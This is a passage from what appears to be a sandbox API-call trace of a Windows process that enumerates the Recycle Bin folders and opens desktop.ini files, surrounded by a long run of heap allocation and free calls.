ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0060.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0060.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.710] AreFileApisANSI () returned 1 [0060.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18", lpUsedDefaultChar=0x0) returned 25 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0060.711] AreFileApisANSI () returned 1 [0060.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0060.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78950 [0060.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78950, cchWideChar=25 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18") returned 25 [0060.711] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18" (normalized: "c:\\$recycle.bin\\s-1-5-18"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.711] GetLastError () returned 0x5 [0060.711] GetLastError () returned 0x5 [0060.711] SetLastError (dwErrCode=0x5) [0060.711] GetLastError () returned 0x5 [0060.711] SetLastError (dwErrCode=0x5) [0060.711] GetLastError () returned 0x5 [0060.711] SetLastError (dwErrCode=0x5) [0060.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78950 | out: hHeap=0x20000) returned 1 [0060.711] AreFileApisANSI () returned 1 [0060.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0060.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78950 [0060.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78950, cchWideChar=25 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18") returned 25 [0060.711] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18" (normalized: "c:\\$recycle.bin\\s-1-5-18"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.711] GetLastError () returned 0x5 [0060.711] GetLastError () returned 0x5 [0060.712] SetLastError (dwErrCode=0x5) [0060.712] GetLastError () returned 0x5 [0060.712] SetLastError (dwErrCode=0x5) [0060.712] GetLastError () returned 0x5 [0060.712] SetLastError (dwErrCode=0x5) [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78950 | out: hHeap=0x20000) returned 1 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.712] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.712] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.713] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0060.713] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.713] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0060.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0060.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0060.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0060.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0060.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.714] AreFileApisANSI () returned 1 [0060.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini", lpUsedDefaultChar=0x0) returned 37 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.714] AreFileApisANSI () returned 1 [0060.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0060.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d0b0 [0060.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0060.714] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.715] GetFileType (hFile=0x424) returned 0x1 [0060.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0060.715] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.715] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.715] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.715] CloseHandle (hObject=0x424) returned 1 [0060.715] AreFileApisANSI () returned 1 [0060.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0060.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d1b8 [0060.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x6d1b8, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0060.715] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.716] GetFileType (hFile=0x424) returned 0x1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0060.716] CloseHandle (hObject=0x424) returned 1 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.717] AreFileApisANSI () returned 1 [0060.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d000 [0060.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x6d000, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0060.717] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0060.717] AreFileApisANSI () returned 1 [0060.717] 